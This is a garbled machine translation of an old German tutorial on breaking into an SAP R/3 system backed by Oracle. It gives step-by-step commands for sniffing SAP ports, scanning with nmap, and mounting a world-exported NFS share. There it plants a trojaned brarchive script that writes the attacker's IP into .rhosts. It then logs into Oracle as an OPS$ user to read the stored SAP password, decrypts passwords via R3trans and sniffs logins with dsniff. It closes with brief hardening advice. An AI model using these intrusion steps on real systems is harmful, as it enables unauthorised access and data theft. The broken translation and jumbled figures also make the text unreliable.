We chop a SAP database Jochen Hein $ Id: ora-hack.xml, v 1.

3 03/01/2002 18:29:36 jhein Exp $ ------------------- ------------------------------------------------- -------------------------------------------------- -------------------------------------- first How to hack a while SAP's Spa Kids, do not do that at home. However, we only use standard techniques to each Admin have long been known. -------------------------------------------------- ----------------------------1.1. Chop with Unix / network means we know nothing (auer, that there should be an SAP R / 3 - Fri chances are good an Oracle database) and have a laptop. Zufl ligerweise we find a wired network socket (or pinch us for fifty with a mini-str oke). And then we listen to what is to come. SAP R / 3 systems knnen be Availabl e on many different ports. In general, we find the application server on a port 3200-3299, the message server between 3600 and 3699th The last two digits are th e so-called system blicherweise number. You can change these ports, although in the profile, but one can assume that most systems are operated in this configura tion. Figure 1 shows an example for the call to tcpdump, but there are still oth er tools. Figure 1 Packet Sniffer # / bin / sh tcpdump-n-i eth0 'tcp [13] & 3! = 0 and \ ((tcp [2:2]> = 3200 tcp [2:2] <3300) or \ 5 (tcp [2:2]> = 3600 tcp [2:2 ] <3700)) ' As a result you get only the connection establishment to an application server o r the message server to see. The first expression tcp [13] & 3! = 0 precisely fi lters out those TCP packets. Here are just IP addresses and port numbers, no nam es will be displayed. The result (Figure 2, shown here only verkrzt remember) we are. Figure 2 Results of the sniffer 192.168.1.1.4722> 192.168.10.1.3200 We know one or more SAP server and knnen it further . Analyze Overcoming this initial attack is to use a switched network where each computer sees only the packets, the FR it is intended. There are attacks agains t switches, hubs, these degenerate, so that after a sniffer can be used again. S ubjects active in the network addresses, we whlen FR The following is a matching IP address (in the hope that comes out, we are not). Helpful for the system adm inistrator wre a tool such as arpwatch, which at least shows the new computer. T he burglar can use natrlich evening a MAC and IP address of a computer workstati on - then helps only a Time Restriction and the appropriate monitoring in the ne twork. With a special Linux system on the laptop to record your fr is the networ k administrator virtually invisible. The special on that Linux is a kernel patch (perhaps under http://linux.davecentral.com/projects/stealthkernelpatch/, which prevents the system to eventually send a package. Otherwise knnte as an Intrusi on Detection System (IDS ) suggested that a computer is active with a network ca rd in Promicous mode. nchsten In step we suggest a free IP address (possibly fro m a night off PC) and use this on our laptop. If it proves prove necessary, to h ave a DNS access, so you listen to packets to port 53 and Carries the appropriat e server locally. With a little Glck we come from without (If the name server wi th the query-log l runs, it bullet Could we be recognized). The program sapgui w e connect to that machine and this port, so that we have in the status bar, the system ID (Figure 3). This is also in the use of Oracle equal to the Oracle SID. If we connect to a port 36nr have found, we try lgtst with the help of the prog ram is (to get the Unix SAPGUI included) for more information about the system. In this case, presumably, the load distribution used. Figure 3 Connecting to SAP GUI SAPGUI / H / victim-IP / S / victim-port -------------------------------------------------- ----------------------------1.2. A short detour from here we are in the network active. If the system admin istrator has an Intrusion Detection System, or port scans or reads respects its log files, then strike him knnte something. Do it no other network - even in you r own, you should first talk to your colleagues. You have been warned. Zunchst w

e get out what there is a system Fri (Tools dafr's on every Straenecke). Dependi ng on the system it may be appropriate to directly attack the system, rootshell dafr is always a good source. telnet is perhaps the name of the operating system . nmap-O-victim IP rtmglicherweise the operating system. This is a Unix system, so I know my way around. A first,€pretty brazen attempt to log in as root with th e rlogin command. Yes, sometimes it works great - game over, thank your for play ing. For Unix systems you can use the command showmount-e find the exported via NFS directories. With a little Glck important volumes have been released to all computers, possibly even to write. A shocking example, see Figure 4 Figure 4 NFS exploit cracker # showmount-e Export list for IP-victim victim-IP: / sapmnt / S ID (everyone) 5 Aha: here, the air system SID. We see that even with the SAPGUI for the port sca n. What is much Utilities, however, we'll be able to mount the NFS volume, creat e a user sidadm and replace any program (yes, this is a practical example that e xists tatschlich - I find almost fahrlssig ). The user sidadm miter the data of the R / 3. On Unix, Oracle database, the user Gehrt orasid. The Figure 5 shows a mgliche approach to replacing Unix programs. With a little Glck fllt on the no - and if so, is difficult to understand something (or you fhren logs about succe ssful NFS mounts?). Figure 5 Capture of a Trojan horse cracker # mount-t nfs Vic tim IP: / sapmnt / SID / mnt # ls-l cracker ... In this list we find the numeric al user ID of the 5-user Unix sidadm ... # adduser-u number cracker cracker sida dm # su - sidadm sidadm> cd / mnt / exe sidadm> brarchive mv. brarchive 10 sidad m> cat> brarchive #! / bin / sh # Create a Hintertr echo my-ip>> $ HOME / .rhost s # And so it will not start the old program auffllt exec / sapmnt / SID / exe / .brarchive Ctrl-C sidadm> chmod a + x brarchive Now just wait a day (nmlich brarchive to nchsten running the Program) and we won . We knnen without Pawort rlogin with the program as sidadm Register. Thank you very much for this simple game. -------------------------------------------------- ----------------------------1.3. Back to results back to SAP now we are on the search for the database serv er. A port scan of the computer found above calculator reveals perhaps the messa ge server, and perhaps an Oracle port. Figure 6 contains a good example. Figure 6 Calling a port scanner nmap-p 3200-3699 <ip-address> nmap-p 1527 <ip-address> These are the ports of the Dispatcher SAP (32xx), any gateway processes (33xx) a nd Message Server (36xx). Search for an Oracle listener. There are people who sa y the would run by default on port 1521st Hm rates prfen: hosts in the Nhe (chan ge the last digit of the IP address)! For more SAP systems can bring the other s erver. Auerdem mglicherweise can take advantage of trust relationships between d ifferent systems - but today is not our goal. Adoption: There is one central ins tance, database and they can run on a computer. Whether this assumption is true, one can find out with the program sapinfo. The program is available on the GUI CD in the RFC SDK. Figure 7 contains another example. Figure 7 The program sapin fo cracker # sapinfo awhost = ip-address SYSNR n = SAP System Information -------------------------------- ------------- Destination Host System ID 10 DB Datab ase host system SAP DB release 15 SAP kernel release protocol RFC Characters Int egers Floating 20 P. SAP machine id Time Zone hostname_SID_nr hostname hostname ORACLE SID SID 40B 40B 011 1100 BIG IE3 320 3600 (Daylight saving time) 5 When a computer with only one network card is now ready. If the computer multi-h omed, then perhaps we can help the issue of lgtst. Otherwise helps either target

ed rates or access to the DNS server of the victim (if available). We now know: The IP address (es) of the victim, the system number of the R / 3 system (the la st two digits of the SAP Ports) The system ID of the system and the Oracle datab ase to make the name of the database server thus armed we are on to the actual g oal: to access the SAP database. ------------------------------------------------- ----------------------------- 1.4. Erhacken the Oracle database, we create a SQL NetV2 configuration, which hopefully gives us access to the database. We ne ed a sqlnet.ora file (standard SAP, see Figure 8) and a tnsnames.ora file (Figur e 9). With the environment variable TNS_ADMIN we'll be able to specify the path to these files - but on our laptop (here are the Oracle programs also installed) as we are free anyway. Figure 8 The file sqlnet.ora ################ # Filename ......: sqlnet.ora # Name ..........: template # 5 Date ..........: ########### ##### AUTOMATIC_IPC TRACE_LEVEL_CLIENT = ON = OFF = 0 10 SQLNET.EXPIRE_TIME NAME S.DEFAULT_DOMAIN NAME.DEFAULT_ZONE = world = world # SQLNET.AUTHENTICATION_SERVI CES = (ALL) Figure 9 The file tnsnames.ora SID.world = (DESCRIPTION = (ADDRESS_LIST = 5 (ADD RESS = (COMMUNITY = sap.world) (PROTOCOL = TCP) (Host = hostname) (Port = 1527) 10) (CONNECT_DATA = (SID = SID) (GLOBAL_NAME SID.world =)))) 15 If the standard were not Pawrter upd we'll be able connect us with the command s apr3/sap @ SID in connect svrmgrl with the database. Otherwise, we mssen using t he OPS $ mechanism of the Oracle database user out of Pawort SAPR3 (Figure 10). Dafrmssen sidadm we create a user on the laptop. Figure 10 Oracle chop sidadm> s idadm> sidadm> 5 sidadm> setenv TNS_ADMIN $ HOME / setenv ORACLE_HOME / oracle / SID setenv ORACLE_SID SID svrmgrl Oracle Server Manager Release 3.0.6.0.0 - Production (c) Copyright 1999 Oracle C orporation. All Rights Reserved. Oracle8 Enterprise Edition Release 8.0.6.1.0 - Production PL / SQL Release 8.0.6 .1.0 - Production SVRMGR> connect / @ SID Connected. SVRMGR> select * from sapus er; USERID PASSWD ------ ----- SAPR3 secret 1 row selected. SVRMGR> connect SAPR 3/geheim @ SID Connected. SVRMGR> 10 We connect to the database as OPS $-user. This is created in Oracle as identifie d externally, so that we do not specify Pawort mssen here. Since we do not work directly on the database server, we specify the SID, this is aufgelst using SQL NetV2 configuration. With the data stored in the table and now we'll be able SAP USER Pawort log on to the database. ------------------------------------------------- ----------------------------- 1.5. Ideas presented there, In the current SAP R / 3 versions verschlsselt the password in the table SAPUSER stored. Thus it is not quite so simple - there are two paths you can fol low: An attack with cryptographic methods to the Verschlsselung. The bullet I wo uld like to try once, but I miss at least the medium term dafr time. The OSS-150 790 Note makes this idea particularly appealing: Fri Verschlsselung which will use the general SAP Verschlsselungsroutine. The LSST suspect that you crack adwa re Passwd from R / 3 users k LOVE JH. install on the laptop, we have used the at tack Fri knnte you tools such as R3trans and thus gain access to the database. S ince the Verschlsselung is implemented in R3trans, msste do you without the abov e analysis, yet have access to all R / 3 data. A quick test shows me the followi ng: Figure 11 R3trans for database access sidadm> export PATH = "$ PATH: oracle/ SID/817_32/bin /: / usr / sap / SID / SYS / exe / run" sidadm> export dbms_type = oraexport DIR_LIBRARY = / usr / sap / SID / export SYS / exe / run sidadm> exp ort dbs_ora_tnsname SID = 5 sidadm> TNS_ADMIN = / home / sidadm sidadm> cat cont rol export compress = no client = 000 # select table where name = T000 select *

from T000 sidadm> R3trans control .. . 10 sidadm> strings trans.dat ... q 000SAP AG Walldorf DEM [...] q 001Auslieferungsmandant R11 Kundstadt EUR [...] ... Here one need only imagine what an attacker knnte do: export clientremove ;-) ta bles and analysis in a WAS import / IDES and generate a WAS a transport file, eg with a user with sufficient permissions or many suitable documents. If R3trans can connect to the database, then you can use tcpdump or dsniff (http://www.monk ey.org/ ~ dugsong dsniff / /, probably dsniff-s ersniffen 4096 [1]) the password . Then as usual, the command can be used svrmgrl. Thank Glckwunsch! ------------------------------------------------- ----------------------------- 1.6. CONSID ERATIONS for SAP password Verschlsselung What SAP called Verschlsselung may, in fact only a disguise. If the Verschlsselu ng f as a function of the password considered, then the password verschlsselte t he result of the function f (password). Since programs such as R3trans are able, without any further settings, the password verschlsselte transform it back into the plaintext exists a function f-1, fr is the f-1 (f (password)) = password. T his is the concealment (as shown above) to berlisten very easy because I am able to let decrypt any password by R3trans veiled. Thus, the cryptographic analysis of the "Verschlsselung" only by sporting interest - the pragmatic approach is s imple, the program R3trans Entschlsselung to use the special password. ------------------------------------------------- ----------------------------- 1.7. Con clusion very much for the flowers. The only workaround that is einfllt me to bui ld a packet filter in front of the Oracle ports and the use of a switched networ k.€Auerdem you should think about a firewall between the SAP servers and the ne twork brige. Really. Mglicherweise wre then the NFS Hack failed. More intensive search in several documents has usually chosen to file protocol.ora. In this fil e, you can turn with the entry validnode_checking an IP-based check program. The entry contains invited_nodes then the allowed IP addresses or host names. Figur e 12 shows a fitting example. Due to an Oracle error, you should never use host names. Can not be a host name aufgelst, the Zugriffsbeschrnkung is repealed with out a message everyone can read all the data again! Figure 12 The file protocol. ora tcp.nodelay = true = yes tcp.validnode_checking tcp.invited_nodes = (IP addr ess, IP address) five disadvantages of using this configuration is that a new ap plication server or a system from the transport network (f r test imports) are i ncluded here mu. They bought the HHer security so more effort and possibly a auf wndigen troubleshooting if you have forgotten this setting. The real problem Gro e, in my view is that SAP is installed in the default installation uncertain, in the Handbchern no information is available about this problem and the fix is we ll hidden in the OSS. Especially systems with some very schtzenswerten informati on, such as SAP R / 3 should not show in the default installation of such Lcken. The problem has been known since 1999, but so far I have not seen any changes i n the installations. -------------------------------------------------- ---------------------------- 1.8. OSS Notes and R / 3 versions 186 119 Note, from Table 4.5B is SAPUSER verschlsselt 186 119 Valid in 4.0x, 4.5 x, 4.6x. Lt. Guide does not change from 6:10 Fri WAS/6.10 unit of the database u ser SAP <SID>: 361 641 Note: Creating the OPS $ user on UNIX R / 3> = 6.10: Use oradbusr.sql the script ( see also note 50 088). Google Bookmark and Share [1] W hy is not capturing dsniff Oracle logins? Increase the default snaple with dsnif f-s 4096th Oracle logins can be quite chatty ...